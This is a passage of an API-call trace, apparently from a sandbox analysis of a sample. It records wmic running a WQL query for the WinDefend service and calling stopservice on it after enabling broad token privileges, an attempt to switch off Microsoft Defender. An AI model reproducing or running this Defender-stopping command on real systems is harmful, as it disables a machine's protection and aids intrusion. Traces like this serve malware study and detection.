ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="PauseService", ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x3276ab8) returned 0x0 [0292.832] lstrlenW (lpString="PauseService") returned 12 [0292.832] lstrlenW (lpString="stopservice") returned 11 [0292.832] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0292.832] IUnknown:Release (This=0x3276ab8) returned 0x0 [0292.832] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="ResumeService", ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x3276ab8) returned 0x0 [0292.832] lstrlenW (lpString="ResumeService") returned 13 [0292.832] lstrlenW (lpString="stopservice") returned 11 [0292.832] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0292.832] IUnknown:Release (This=0x3276ab8) returned 0x0 [0292.832] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="InterrogateService", ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x3276ab8) returned 0x0 [0292.832] lstrlenW (lpString="InterrogateService") returned 18 [0292.832] lstrlenW (lpString="stopservice") returned 11 [0292.832] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0292.832] IUnknown:Release (This=0x3276ab8) returned 0x0 [0292.832] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="UserControlService", ppInSignature=0x2d6d844*=0x32a05a0, ppOutSignature=0x2d6d840*=0x32a3058) returned 0x0 [0292.833] lstrlenW (lpString="UserControlService") returned 18 [0292.833] lstrlenW (lpString="stopservice") returned 11 [0292.833] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0292.833] IUnknown:Release (This=0x32a05a0) returned 0x0 [0292.833] IUnknown:Release (This=0x32a3058) returned 0x0 [0292.833] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="Create", ppInSignature=0x2d6d844*=0x32a05a0, ppOutSignature=0x2d6d840*=0x32a5028) returned 0x0 [0292.834] lstrlenW (lpString="Create") returned 6 [0292.834] lstrlenW (lpString="stopservice") returned 11 [0292.834] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0292.834] IUnknown:Release (This=0x32a05a0) returned 0x0 [0292.834] IUnknown:Release (This=0x32a5028) returned 0x0 [0292.834] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="Change", ppInSignature=0x2d6d844*=0x32a05a0, ppOutSignature=0x2d6d840*=0x32a4da8) returned 0x0 [0292.834] lstrlenW (lpString="Change") returned 6 [0292.834] lstrlenW (lpString="stopservice") returned 11 [0292.834] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0292.834] IUnknown:Release (This=0x32a05a0) returned 0x0 [0292.834] IUnknown:Release (This=0x32a4da8) returned 0x0 [0292.834] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="ChangeStartMode", ppInSignature=0x2d6d844*=0x32a05a0, ppOutSignature=0x2d6d840*=0x32a31c8) returned 0x0 [0292.834] lstrlenW (lpString="ChangeStartMode") returned 15 [0292.834] lstrlenW (lpString="stopservice") returned 11 [0292.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0292.835] IUnknown:Release (This=0x32a05a0) returned 0x0 [0292.835] IUnknown:Release (This=0x32a31c8) returned 0x0 [0292.835] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="Delete", ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x3276ab8) returned 0x0 [0292.835] lstrlenW (lpString="Delete") returned 6 [0292.835] lstrlenW (lpString="stopservice") returned 11 [0292.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0292.835] IUnknown:Release (This=0x3276ab8) returned 0x0 [0292.835] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="GetSecurityDescriptor", ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x32a05a0) returned 0x0 [0292.835] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0292.835] lstrlenW (lpString="stopservice") returned 11 [0292.835] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0292.835] IUnknown:Release (This=0x32a05a0) returned 0x0 [0292.835] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*="SetSecurityDescriptor", ppInSignature=0x2d6d844*=0x32a05a0, ppOutSignature=0x2d6d840*=0x32a3058) returned 0x0 [0292.835] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0292.835] lstrlenW (lpString="stopservice") returned 11 [0292.836] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0292.836] IUnknown:Release (This=0x32a05a0) returned 0x0 [0292.836] IUnknown:Release (This=0x32a3058) returned 0x0 [0292.836] IWbemClassObject:NextMethod (in: This=0x32a03a8, lFlags=0, pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0 | out: pstrName=0x2d6d848*=0x0, ppInSignature=0x2d6d844*=0x0, ppOutSignature=0x2d6d840*=0x0) returned 0x40005 [0292.836] IUnknown:Release (This=0x32a03a8) returned 0x0 [0292.836] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0292.836] lstrlenW (lpString="SET") returned 3 [0292.836] lstrlenW (lpString="call") returned 4 [0292.836] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0292.836] lstrlenW (lpString="CREATE") returned 6 [0292.836] lstrlenW (lpString="call") returned 4 [0292.836] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0292.836] free (_Block=0x3422d20) [0292.836] malloc (_Size=0x4) returned 0x3422ee8 [0292.836] lstrlenW (lpString="GET") returned 3 [0292.836] lstrlenW (lpString="call") returned 4 [0292.836] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0292.836] lstrlenW (lpString="LIST") returned 4 [0292.836] lstrlenW (lpString="call") returned 4 [0292.837] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0292.837] lstrlenW (lpString="ASSOC") returned 5 [0292.837] lstrlenW (lpString="call") returned 4 [0292.837] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0292.837] WbemLocator:IUnknown:AddRef (This=0x3244818) returned 0x3 [0292.837] free (_Block=0x3422788) [0292.837] lstrlenW (lpString="") returned 0 [0292.837] lstrlenW (lpString="NQDPDE") returned 6 [0292.837] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0292.837] lstrlenW (lpString="NQDPDE") returned 6 [0292.837] malloc (_Size=0xe) returned 0x342ae88 [0292.837] lstrlenW (lpString="NQDPDE") returned 6 [0292.837] GetCurrentThreadId () returned 0x11f4 [0292.837] GetCurrentProcess () returned 0xffffffff [0292.837] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2d6f924 | out: TokenHandle=0x2d6f924*=0x2f8) returned 1 [0292.837] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2d6f920 | out: TokenInformation=0x0, ReturnLength=0x2d6f920) returned 0 [0292.837] malloc (_Size=0x118) returned 0x342b9b8 [0292.837] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x342b9b8, TokenInformationLength=0x118, ReturnLength=0x2d6f920 | out: TokenInformation=0x342b9b8, ReturnLength=0x2d6f920) returned 1 [0292.837] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x342b9b8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0292.837] free (_Block=0x342b9b8) [0292.837] CloseHandle (hObject=0x2f8) returned 1 [0292.837] lstrlenW (lpString="GET") returned 3 [0292.837] lstrlenW (lpString="call") returned 4 [0292.838] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0292.838] lstrlenW (lpString="LIST") returned 4 [0292.838] lstrlenW (lpString="call") returned 4 [0292.838] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0292.838] lstrlenW (lpString="SET") returned 3 [0292.838] lstrlenW (lpString="call") returned 4 [0292.838] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0292.838] lstrlenW (lpString="CALL") returned 4 [0292.838] lstrlenW (lpString="call") returned 4 [0292.838] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0292.838] ??0CHString@@QAE@XZ () returned 0x2d6f8e4 [0292.838] GetCurrentThreadId () returned 0x11f4 [0292.838] malloc (_Size=0xc) returned 0x342ae58 [0292.838] malloc (_Size=0xc) returned 0x342aeb8 [0292.838] malloc (_Size=0xc) returned 0x342ae28 [0292.838] malloc (_Size=0xc) returned 0x342aed0 [0292.838] malloc (_Size=0xc) returned 0x3429880 [0292.838] SysStringLen (param_1="\\\\") returned 0x2 [0292.838] SysStringLen (param_1="NQDPDE") returned 0x6 [0292.839] malloc (_Size=0xc) returned 0x342bdf0 [0292.839] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0292.839] SysStringLen (param_1="\\") returned 0x1 [0292.839] malloc (_Size=0xc) returned 0x342bd48 [0292.839] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0292.839] SysStringLen (param_1="root\\cimv2") returned 0xa [0292.839] free (_Block=0x342bdf0) [0292.839] free (_Block=0x3429880) [0292.839] free (_Block=0x342aed0) [0292.839] free (_Block=0x342ae28) [0292.839] free (_Block=0x342aeb8) [0292.839] free (_Block=0x342ae58) [0292.839] malloc (_Size=0xc) returned 0x342bd60 [0292.839] malloc (_Size=0xc) returned 0x342bf40 [0292.840] malloc (_Size=0xc) returned 0x342bfa0 [0292.840] WbemLocator:IWbemLocator:ConnectServer (in: This=0x3244818, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x32a0c10) returned 0x0 [0292.861] free (_Block=0x342bfa0) [0292.862] free (_Block=0x342bf40) [0292.862] free (_Block=0x342bd60) [0292.862] CoSetProxyBlanket (pProxy=0x32a0c10, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0292.862] free (_Block=0x342bd48) [0292.862] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0292.862] ??0CHString@@QAE@XZ () returned 0x2d6f8dc [0292.863] GetCurrentThreadId () returned 0x11f4 [0292.863] malloc (_Size=0x38) returned 0x342b9b8 [0292.863] malloc (_Size=0x28) returned 0x342b9f8 [0292.863] malloc (_Size=0x28) returned 0x342ba28 [0292.863] malloc (_Size=0x38) returned 0x342ba58 [0292.863] malloc (_Size=0x38) returned 0x342ba98 [0292.863] malloc (_Size=0x24) returned 0x342bad8 [0292.863] malloc (_Size=0xc) returned 0x342aeb8 [0292.863] lstrlenA (lpString="") returned 0 [0292.863] malloc (_Size=0x2) returned 0x3422788 [0292.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3422788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0292.863] free (_Block=0x3422788) [0292.863] malloc (_Size=0x38) returned 0x342bb08 [0292.863] malloc (_Size=0x24) returned 0x342bb48 [0292.863] malloc (_Size=0xc) returned 0x342aed0 [0292.863] free (_Block=0x342aeb8) [0292.863] IWbemServices:GetObject (in: This=0x32a0c10, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x2d6f8b4*=0x0, ppCallResult=0x0 | out: ppObject=0x2d6f8b4*=0x32a03a8, ppCallResult=0x0) returned 0x0 [0292.925] malloc (_Size=0xc) returned 0x342ae28 [0292.925] IWbemClassObject:GetMethod (in: This=0x32a03a8, wszName="stopservice", lFlags=0, ppInSignature=0x2d6f8d0, ppOutSignature=0x2d6f8b0 | out: ppInSignature=0x2d6f8d0*=0x0, ppOutSignature=0x2d6f8b0*=0x32a37e0) returned 0x0 [0292.925] free (_Block=0x342ae28) [0292.925] IUnknown:Release (This=0x32a37e0) returned 0x0 [0292.925] IUnknown:Release (This=0x32a03a8) returned 0x0 [0292.925] ??0CHString@@QAE@XZ () returned 0x2d6f794 [0292.925] GetCurrentThreadId () returned 0x11f4 [0292.925] malloc (_Size=0xc) returned 0x342ae28 [0292.925] lstrlenA (lpString="") returned 0 [0292.925] malloc (_Size=0x2) returned 0x3422788 [0292.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3422788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0292.926] free (_Block=0x3422788) [0292.926] malloc (_Size=0xc) returned 0x342ae58 [0292.926] lstrlenA (lpString="") returned 0 [0292.926] malloc (_Size=0x2) returned 0x3422788 [0292.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x3422788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0292.926] free (_Block=0x3422788) [0292.926] malloc (_Size=0xc) returned 0x342aeb8 [0292.926] free (_Block=0x342ae58) [0292.926] malloc (_Size=0xc) returned 0x342ae58 [0292.926] lstrlenA (lpString="SELECT * FROM ") returned 14 [0292.926] malloc (_Size=0x1e) returned 0x342bb78 [0292.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x342bb78, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0292.926] free (_Block=0x342bb78) [0292.926] malloc (_Size=0xc) returned 0x3429880 [0292.926] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0292.926] SysStringLen (param_1="Win32_Service") returned 0xd [0292.926] free (_Block=0x342ae58) [0292.926] malloc (_Size=0xc) returned 0x342ae58 [0292.927] malloc (_Size=0xc) returned 0x342bf88 [0292.927] lstrlenA (lpString=" WHERE ") returned 7 [0292.927] malloc (_Size=0x10) returned 0x342bd48 [0292.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x342bd48, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0292.927] free (_Block=0x342bd48) [0292.927] malloc (_Size=0xc) returned 0x342bd90 [0292.927] SysStringLen (param_1=" WHERE ") returned 0x7 [0292.927] SysStringLen (param_1="name like '%%WinDefend%%'") returned 0x19 [0292.927] malloc (_Size=0xc) returned 0x342bf58 [0292.927] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0292.927] SysStringLen (param_1=" WHERE name like '%%WinDefend%%'") returned 0x20 [0292.927] free (_Block=0x3429880) [0292.927] free (_Block=0x342bd90) [0292.927] free (_Block=0x342bf88) [0292.927] free (_Block=0x342ae58) [0292.927] malloc (_Size=0xc) returned 0x342bec8 [0292.927] IWbemServices:ExecQuery (in: This=0x32a0c10, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%WinDefend%%'", lFlags=48, pCtx=0x0, ppEnum=0x2d6f7a0 | out: ppEnum=0x2d6f7a0*=0x32a41e8) returned 0x0 [0292.947] free (_Block=0x342bec8) [0292.947] CoSetProxyBlanket (pProxy=0x32a41e8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0292.954] IEnumWbemClassObject:Next (in: This=0x32a41e8, lTimeout=-1, uCount=0x1, apObjects=0x2d6f79c, puReturned=0x2d6f78c | out: apObjects=0x2d6f79c*=0x32a6e18, puReturned=0x2d6f78c*=0x1) returned 0x0 [0294.267] IWbemClassObject:Get (in: This=0x32a6e18, wszName="__PATH", lFlags=0, pVal=0x2d6f768*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2d6f768*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"WinDefend\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0294.267] malloc (_Size=0xc) returned 0x342bd60 [0294.267] ??0CHString@@QAE@XZ () returned 0x2d6f718 [0294.267] GetCurrentThreadId () returned 0x11f4 [0294.267] LoadStringW (in: hInstance=0x0, uID=0xb7ea, lpBuffer=0x2d6e6cc, cchBufferMax=1024 | out: lpBuffer="Executing (%1)->%2()\r\n") returned 0x16 [0294.268] FormatMessageW (in: dwFlags=0x2500, lpSource=0x2d6e6cc, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x2d6e6b4, nSize=0x0, Arguments=0x2d6e6b8 | out: lpBuffer="櫨̪㝴̧⦠͂InterfExecuting (%1)->%2()\r\n") returned 0x4f [0294.268] malloc (_Size=0xc) returned 0x342beb0 [0294.268] LocalFree (hMem=0x32a6ae8) returned 0x0 [0294.268] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"WinDefend\")->stopservice()\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0294.268] malloc (_Size=0x50) returned 0x342bb78 [0294.268] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"WinDefend\")->stopservice()\r\n", cchWideChar=-1, lpMultiByteStr=0x342bb78, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Executing (\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"WinDefend\")->stopservice()\r\n", lpUsedDefaultChar=0x0) returned 80 [0294.268] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0294.268] __iob_func () returned 0x776f2608 [0294.268] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 79 [0294.269] __iob_func () returned 0x776f2608 [0294.269] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0294.269] free (_Block=0x342bb78) [0294.269] free (_Block=0x342beb0) [0294.269] malloc (_Size=0xc) returned 0x342bd18 [0294.269] IWbemServices:ExecMethod (in: This=0x32a0c10, strObjectPath="\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"WinDefend\"", strMethodName="stopservice", lFlags=0, pCtx=0x0, pInParams=0x0, ppOutParams=0x2d6f728*=0x0, ppCallResult=0x0 | out: ppOutParams=0x2d6f728*=0x3278e30, ppCallResult=0x0) returned 0x0 [0295.051] free (_Block=0x342bd18) [0295.051] malloc (_Size=0x800) returned 0x342d180 [0295.051] LoadStringW (in: hInstance=0x0, uID=0xb3b3, lpBuffer=0x342d180, cchBufferMax=1024 | out: lpBuffer="Method execution successful.\r\n") returned 0x1e [0295.051] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0295.052] malloc (_Size=0x1f) returned 0x342bb78 [0295.052] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x342bb78, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Method execution successful.\r\n", lpUsedDefaultChar=0x0) returned 31 [0295.052] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0295.052] __iob_func () returned 0x776f2608 [0295.052] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 30 [0295.052] __iob_func () returned 0x776f2608 [0295.052] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0295.052] free (_Block=0x342bb78) [0295.052] free (_Block=0x342d180) [0295.052] IUnknown:AddRef (This=0x3278e30) returned 0x2 [0295.052] ??0CHString@@QAE@XZ () returned 0x2d6eec0 [0295.052] GetCurrentThreadId () returned 0x11f4 [0295.052] IWbemClassObject:GetObjectText (in: This=0x3278e30, lFlags=0, pstrObjectText=0x2d6eec8 | out: pstrObjectText=0x2d6eec8*="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n") returned 0x0 [0295.052] malloc (_Size=0x800) returned 0x342d180 [0295.052] LoadStringW (in: hInstance=0x0, uID=0xb7f7, lpBuffer=0x342d180, cchBufferMax=1024 | out: lpBuffer="Out Parameters:") returned 0xf [0295.052] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0295.052] malloc (_Size=0x10) returned 0x342be68 [0295.052] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x342be68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Out Parameters:", lpUsedDefaultChar=0x0) returned 16 [0295.052] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0295.052] __iob_func () returned 0x776f2608 [0295.052] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 15 [0295.052] __iob_func () returned 0x776f2608 [0295.053] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0295.053] free (_Block=0x342be68) [0295.053] free (_Block=0x342d180) [0295.053] malloc (_Size=0xc) returned 0x342bd18 [0295.053] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0295.053] malloc (_Size=0x32) returned 0x342bb78 [0295.053] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n", cchWideChar=-1, lpMultiByteStr=0x342bb78, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n", lpUsedDefaultChar=0x0) returned 50 [0295.053] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0295.053] __iob_func () returned 0x776f2608 [0295.053] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 49 [0295.053] __iob_func () returned 0x776f2608 [0295.053] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0295.053] free (_Block=0x342bb78) [0295.053] free (_Block=0x342bd18) [0295.053] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0295.053] malloc (_Size=0x2) returned 0x3422788 [0295.053] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x3422788, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 2 [0295.053] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0295.053] __iob_func () returned 0x776f2608 [0295.054] fprintf (in: _File=0x776f2648, _Format="%s" | out: _File=0x776f2648) returned 1 [0295.054] __iob_func () returned 0x776f2608 [0295.054] fflush (in: _File=0x776f2648 | out: _File=0x776f2648) returned 0 [0295.055] free (_Block=0x3422788) [0295.055] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.055] IUnknown:Release (This=0x3278e30) returned 0x1 [0295.055] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0295.055] free (_Block=0x342bd60) [0295.055] IUnknown:Release (This=0x32a6e18) returned 0x0 [0295.056] IEnumWbemClassObject:Next (in: This=0x32a41e8, lTimeout=-1, uCount=0x1, apObjects=0x2d6f79c, puReturned=0x2d6f78c | out: apObjects=0x2d6f79c*=0x0, puReturned=0x2d6f78c*=0x0) returned 0x1 [0295.057] IUnknown:Release (This=0x32a41e8) returned 0x0 [0295.059] 